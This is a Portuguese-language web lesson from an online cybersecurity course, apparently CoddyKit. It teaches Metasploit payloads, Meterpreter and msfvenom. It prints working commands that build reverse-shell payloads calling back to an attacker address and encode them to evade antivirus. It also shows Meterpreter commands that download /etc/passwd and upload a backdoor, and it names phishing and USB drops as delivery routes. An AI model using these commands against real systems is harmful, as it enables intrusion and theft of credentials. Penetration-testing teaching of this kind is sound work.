0Pricing
Cyber Security Academy · Aula

Cargas: em Estágios ou sem Estágios, Meterpreter

Escolha a carga adequada para cada cenário e use o Meterpreter na pós-exploração.

Cargas: em Estágios ou sem Estágios, Meterpreter é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 3 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

O que é uma carga útil?

Uma carga útil é o código executado no destino após uma exploração bem-sucedida. Ela define o que o invasor obtém: um console de comandos, execução de comandos, acesso a arquivos ou um agente completo como o Meterpreter.

Cargas úteis com estágio e sem estágio

As cargas úteis Stageless (/) contêm tudo em um único binário — são maiores, mas mais simples, e não precisam de uma chamada de rede após a entrega inicial. As cargas úteis Staged (//) enviam primeiro um pequeno iniciador que baixa o segundo estágio do manipulador.

# Stageless (single slash naming):
windows/x64/shell_reverse_tcp

# Staged (double slash naming):
windows/x64/shell/reverse_tcp
#                 ^
#                 stage 2 downloaded after stager connects

Quando usar cada uma

Use stageless quando o destino não tiver acesso à Internet ou ao manipulador após a exploração inicial — a carga útil precisa ser independente. Use staged quando quiser uma carga útil inicial menor e tiver uma conexão confiável com o manipulador.

Visão geral do Meterpreter

O Meterpreter é a carga útil avançada do Metasploit: é executado inteiramente na memória, usa comunicações criptografadas e fornece uma API abrangente, com acesso ao sistema de arquivos, migração de processos, captura de teclas, captura de telas e pivoteamento.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > run

Comandos do Meterpreter

Comandos essenciais do Meterpreter para a pós-exploração: informações do sistema, lista de processos, operações com arquivos e rede.

meterpreter > sysinfo          # system information
meterpreter > getuid           # current user
meterpreter > ps               # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell            # drop to OS shell

Migração de processos

Migre o processo do Meterpreter para um processo mais estável ou menos suspeito (por exemplo, explorer.exe no Windows). Isso também pode elevar privilégios se a migração for feita para um processo com privilégios mais altos.

meterpreter > ps
meterpreter > migrate 1234     # migrate to PID 1234

# Migrate to explorer.exe for stability
# Avoids termination if original process exits

Gerando cargas úteis com o msfvenom

O msfvenom gera arquivos de cargas úteis independentes (EXE, ELF, APK, código de shell) para entrega por mensagens fraudulentas, dispositivos USB deixados no local ou shells da Web em testes autorizados.

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o payload.elf

Multi/Handler para capturar consoles

O módulo auxiliar multi/handler captura conexões reversas de comandos. Configure-o com a mesma carga útil, LHOST e LPORT usados no msfvenom antes de entregar a carga útil.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j      # run as background job

Noções básicas de codificação e evasão

Os codificadores do msfvenom podem ofuscar cargas úteis para evitar a detecção básica do AV baseada em assinaturas. Observação: o EDR moderno usa detecção comportamental — os codificadores, sozinhos, são insuficientes contra defesas avançadas.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o encoded_payload.exe

Cargas úteis de vinculação e reversas

As cargas úteis reversas conectam-se do destino ao invasor (melhor opção para NAT e firewalls). As cargas úteis de vinculação escutam no destino — o invasor conecta-se a ele. As cargas reversas são preferidas na maioria dos cenários.

Detecção de cargas úteis pelos defensores

Os defensores detectam o Meterpreter por meio de: assinaturas de rede (padrões de tráfego de comando e controle), varredura de memória (artefatos de injeção reflexiva de DLL) e análise comportamental (esvaziamento de processos e relações incomuns entre processos pai e filho).

Verificação rápida

O que distingue uma carga útil com estágio de uma sem estágio no Metasploit?

Resumo: cargas úteis e Meterpreter

Escolha cargas úteis com estágio para obter uma presença inicial pequena e cargas sem estágio para uma entrega independente. O Meterpreter é a carga útil mais capaz para a pós-exploração: executado na memória, criptografado e extensível. Use o msfvenom para gerar binários independentes e sempre configure o multi/handler para capturar as conexões de retorno.

Perguntas Frequentes

A aula “Cargas: em Estágios ou sem Estágios, Meterpreter” é grátis?

Sim — o texto completo de “Cargas: em Estágios ou sem Estágios, Meterpreter” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Cargas: em Estágios ou sem Estágios, Meterpreter”?

Escolha a carga adequada para cada cenário e use o Meterpreter na pós-exploração. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 3 de 4.

Quanto tempo leva a aula “Cargas: em Estágios ou sem Estágios, Meterpreter”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Metasploit e msfconsole
  2. Exploração de uma Vulnerabilidade Conhecida
  3. Cargas: em Estágios ou sem Estágios, Meterpreter
  4. Pós-Exploração: Pivotar e Persistir
← Voltar para Cyber Security Academy